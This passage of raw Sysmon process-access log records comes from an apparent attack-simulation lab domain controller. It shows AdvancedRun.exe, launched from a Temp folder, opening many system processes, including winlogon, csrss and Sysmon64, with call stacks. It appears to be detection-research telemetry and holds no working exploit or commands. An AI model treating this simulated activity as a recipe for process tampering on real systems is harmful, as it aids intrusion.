ministrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968283Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-F100-000000002402}4980C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968282Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-F000-000000002402}4892C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968281Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-EE00-000000002402}4728C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968280Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968279Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.717{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E700-000000002402}4232C:\Windows\system32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968278Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E500-000000002402}4164C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968277Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E400-000000002402}4156C:\Windows\system32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968276Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E300-000000002402}4104C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968275Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E200-000000002402}2056C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968274Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.716{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DF00-000000002402}908C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000002968273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DD00-000000002402}4000C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968272Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBC-61E7-DC00-000000002402}2092C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0B37-61E7-8500-000000002402}500C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.715{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-4300-000000002402}3476C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.714{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AC0-61E7-3F00-000000002402}3388C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.714{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABF-61E7-3800-000000002402}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
